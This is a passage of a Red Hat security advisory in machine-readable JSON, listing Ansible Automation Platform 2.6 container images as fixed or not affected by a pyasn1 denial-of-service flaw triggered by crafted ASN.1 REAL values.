"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500041"
}
],
"notes": [
{
"category": "description",
"text": "A remote attacker can exploit this by providing specially crafted BER/CER/DER-encoded ASN.1 data with a large exponent in the REAL value. When the application subsequently prints, logs, compares, or performs arithmetic on the decoded value, this can cause excessive CPU and memory consumption, leading to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: pyasn1: Denial of Service via crafted ASN.1 REAL values",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw in pyasn1, rated as Important, could lead to a denial of service in Red Hat products that process untrusted ASN.1 data. A remote attacker could send a specially crafted BER, CER, or DER encoded REAL value with a large exponent, causing applications to consume excessive resources during decoding operations such as printing, logging, or arithmetic, thereby rendering the service unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
